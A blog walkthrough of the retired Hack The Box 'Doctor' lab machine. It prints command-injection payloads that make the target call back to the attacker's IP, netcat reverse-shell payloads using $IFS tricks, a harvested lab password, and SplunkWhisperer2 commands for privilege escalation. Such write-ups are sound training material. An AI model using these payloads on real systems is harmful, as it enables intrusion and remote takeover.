HTB Doctor Machine Walkthrough

February 10, 2021
Browse All Blogs
The Doctor is a recently retired Linux machine. The IP address of the machine is 10.10.10.209. The level of difficulty is "easy" but the user rating is an appropriate medium, to be honest.
Here, you need to capture two flags. The user flag and root flag. When you submit both flags, your score is  20 points.
Before beginning, check the connection to your doctor's machine using ping 10.10.10.209. If you get the answer, you're good to go.

Scanning 

Begin with the Nmap scan as normal. The scan reveals 3 open ports. Open SSH on port 22, Apache2 on port 80, and Splunkd on port 8089.
Let's start with exploring the web service on port 80. You can use 10.10.10.209 to navigate to the website. You're going to have a static website with basic pages.
On this site, there was no login page. info@doctors.htb email address identified when browsing the website. This email address includes a domain, doctors. htb. Add the domain in etc/hosts file. We'll get a different website, If any virtual hosting is allowed.
After adding a domain, go to the http://doctors.htb URL. You're going to find the Login tab. Once you have tried a few choices to log in, to receive the credential, clicking on Register to build an account. It's recommended to use incognito mode in firefox to prevent problems.
You will get a message on the screen that your account has a time limit of 20 minutes.
To test the machine, add title and content using tag and use Python to get the connection. It is clear that the application is communicating to the local machine
In other words, we can say that we injected the data from the application and retrieved the information in the local system.
Again to test started a netcat listener to port 80 on the kali machine. Inserted title and in content added <img src=http://your-IP-address/$(id)> . Here tried to get the id. As id is the system command, here used sign. Click on the post button. If everything is okay you should get the information about id.

Checking for RCE

To test RCE, we need to start the python webserver on our local machine and look carefully at the REQUESTS made to this web server. To check the RCE inject the code <img src=http://your-IP-address/$(id)> in the Content box and after you have posted a script, you will get a REQUEST on your web server and it will also include the Uid of the user running the command here web. From this, we can confirm the remote code execution on a doctor machine.

Getting Reverse Shell

You can use nc.traditional to get the reverse shell. Start the netcat listener on port 4444 and add <img src=http://your-ip-address/$(nc.traditional$IFS-e$IFS/bin/bash$IFS) to your-ip-address '$IFS'4444') in the contents section.
The $IFS variable is the Internal Field Separator in a shell script whose default value is space.
To check whether python3 is installed on the doctor machine command which python3 is being used.
Python3-c 'import pty;pty.spawn('/bin/bash')'
TERM=xterm export
Using the above order, we have the proper shell on the doctor's machine.
There are two users named web and Shaun in the home directory of a doctor,. Try to move the user to Shaun, but it needs a password, and so far we have no credential.
To get the credentials here we are using linpeas.sh script. To download linpeas on doctor machine, using python -m http.server 9090 command linpeas.sh is downloaded in the doctor machine.
Linpeas. sh has found the password Guitar123 in the backup folder of apache2. You can find this file in directory /var/log/apache2/.
Try to use this credential on user Shaun and successfully switch to Shaun.
Congratulations ! you have successfully acquired the user flag.

Privilege Escalation

Linpeas. sh also indicted of escalating privileges on Splunk. Did some research on how to perform privilege escalation using Splunk and got the compatible thing in the first link.
To escalate privileges the SplunkWhisperer2 tool is used. Follow the steps below to escalate the privilege.
Start netcat listener in one window
nc -l 6666
Clone the repository from here
git clone https://github.com/cnotin/SplunkWhisperer2.git
Change the directory to SplunkWhisperer2/PySplunkWhisperer2
Run the following command
$python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost your-ip-address --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh your-ip-address 6666’.

Root Flag

Congratulations! You have successfully acquired the root flag as well.
I hope this walkthrough was helpful and you were able to learn some new things from this walkthrough.

Users also read:

March 3, 2021
The Real Way To Get Geo Location Of Any Device With Kali Linux

In this post, learn how to locate any device through Kali Linux using tools. Here, nGrok, sneeker, and IP locator tools are used. Before diving into the practical let’s take a look at some theoretical aspects.

February 23, 2021
How to Snoop With Kali Linux on Bluetooth devices

Bluetooth has become a major component of our lives. Bluetooth devices used every day by many individuals around the globe.

February 16, 2021
How to do Server Side Includes Injection (SSI) Using bWAPP

On the HTML page, SSI directives are used for dynamic content. SSIs are used to run some activities before loading the current page.

Leave a Reply

Your email address will not be published. Required fields are marked *

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram